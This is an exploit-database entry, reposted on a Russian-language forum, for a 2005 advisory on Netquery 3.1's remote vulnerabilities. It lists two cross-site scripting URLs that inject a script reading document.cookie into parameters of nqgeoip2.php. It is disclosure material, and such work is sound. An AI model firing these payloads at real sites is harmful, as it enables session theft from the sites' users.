- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 26026
- Проверка EDB
-
- Пройдено
- Автор
- RGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2005-07-25
Код:
source: https://www.securityfocus.com/bid/14373/info
Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks.
Netquery 3.1 is affected by these vulnerabilities.
http://www.example.com/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://www.example.com/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
- Источник
- www.exploit-db.com